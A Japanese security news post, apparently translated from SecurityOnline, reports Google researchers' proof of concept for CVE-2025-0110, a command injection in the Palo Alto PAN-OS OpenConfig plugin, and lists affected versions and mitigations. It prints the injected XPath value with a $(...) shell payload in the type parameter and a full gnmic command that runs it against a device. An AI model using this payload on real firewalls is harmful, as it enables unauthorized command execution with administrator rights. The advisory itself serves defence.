Palo Alto PAN-OS Firewall の脆弱性 CVE-2025-0110 が FIX:任意のコマンド実行と PoC

Google Releases PoC for CVE-2025-0110 Command Injection in PAN-OS Firewalls

2025/02/20 SecurityOnline — Palo Alto Networks の PAN-OS ファイアウォールの脆弱性 CVE-2025-0110 (CVSSv4:8.6:High) に関する、技術的な詳細と PoC エクスプロイトが、Google の研究者たちにより公開された。 この脆弱性の悪用に成功した認証済の攻撃者は、基盤となる OS 上で、管理者権限による任意のコマンド実行の可能性を得る。

この脆弱性は、gnmi.Subscribe 関数を通じてシステム・ログを取得する、PAN-OS OpenConfig プラグインに存在する。この脆弱性の悪用により、OpenConfig API リクエストの type パラメータを操作する攻撃者は、ファイアウォール上で任意の bash コマンドを挿入/実行できる。

この脆弱性は、OpenConfig API の XPATH クエリ構造を悪用する、特別に細工されたリクエストによりトリガーされる:

/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]

gnmic ツールを悪用する攻撃者は、PAN-OS デバイス上で任意の bash コマンドを実行できる:

./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]' 

このレスポンスが示すのは、対象となるシステムがコマンド・インジェクションに対して脆弱であることだ。

この脆弱性が影響を及ぼす範囲は、OpenConfig プラグインが有効化されている PAN-OS デプロイメントとなる。具体的には、以下のバージョンが含まれる:

  • PAN-OS 11.0.4 以降 (OpenConfig 2.0.1+ が付属)
  • PAN-OS 10.2.11 以降 (OpenConfig 2.0.2+ が付属)

OpenConfig API は、ポート 9339 の PAN-OS 管理インターフェイスを介してアクセス可能であるため、それが公開される状況にあると、深刻なセキュリティ・リスクが生じる。

すでに Palo Alto Networks は、PAN-OS 11.2.5 以降に含まれる OpenConfig プラグインに対するセキュリティ修正プログラムを、バージョン 2.1.2 としてリリースしている。ユーザーは、以下の方法によりリスクを軽減できる:

  • OpenConfig プラグインをバージョン 2.1.2 以降に更新する。
  • 不要な場合には、OpenConfig の無効化もしくはアンインストールを実施する。
  • 管理インターフェイスへのアクセスを、信頼できるネットワークだけに制限する。

1週間ほど前に FIX した Palo Alto PAN-OS Firewall の脆弱性 CVE-2025-0110 ですが、PoC が公開されました。ここのところ、Palo Alto の脆弱性情報が連日公開されていて混乱しそうですが、アップデートを忘れないよう、お気をつけください。この脆弱性の第一報は、2025/02/12:Palo Alto PAN-OS の脆弱性 CVE-2025-0108/0110 が FIX:認証バイパスと任意のコマンド実行の恐れ」となります。よろしければ、Palo Alto で検索と併せて、ご参照下さい。